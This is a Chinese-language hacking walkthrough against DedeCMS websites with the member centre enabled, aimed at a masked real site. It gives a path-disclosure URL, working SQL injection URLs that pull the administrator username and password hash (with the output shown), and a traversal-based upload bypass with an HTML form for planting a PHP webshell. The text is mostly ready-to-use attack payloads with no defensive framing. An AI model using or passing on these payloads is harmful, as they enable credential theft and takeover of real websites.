此方法的目标dedecms必须开启会员中心

微信截图_20190815142636.png

(系统关闭了会员功能,因此你无法访问此页面!)

爆路径:data/mysql_error_trace.inc

①注入漏洞
这站 http://www.xxxxxxxx.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
然后写上语句
查看管理员帐号

http://www.xxxxxxxx.com/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

admin

查看管理员密码

http://www.xxxxxxxx.com/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

8d29b1ef9f8c5a5af429

查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

8d2
9b1ef9f8c5a5af42
9

cmd5没解出来 只好测试第二个方法

②上传漏洞

只要登陆会员中心,然后访问页面链接

http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs=../dialog/select_soft_post

如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

<form action="http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="simple.Php"/>
<button class="button2" type="submit">提交</button><br><br

即可上传成功